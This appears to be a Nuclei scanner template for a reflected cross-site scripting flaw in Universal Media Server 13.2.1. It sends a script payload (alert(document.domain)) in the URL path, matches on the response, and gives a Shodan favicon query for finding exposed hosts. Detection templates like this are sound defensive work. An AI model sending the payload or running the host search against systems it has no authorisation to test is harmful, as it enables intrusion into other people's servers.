id: universal-media-xss info: name: Universal Media Server v13.2.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: | Universal Media Server v13.2.1 CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability. remediation: Fixed in version 13.2.2 reference: - https://packetstormsecurity.com/files/171754/Universal-Media-Server-13.2.1-Cross-Site-Scripting.html metadata: max-request: 1 verified: true shodan-query: http.favicon.hash:-902890504 tags: xss,universal,media,unauth,packetstorm http: - method: GET path: - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - "" - "404 - File Not Found" condition: and - type: word part: header words: - "text/html" - type: status status: - 200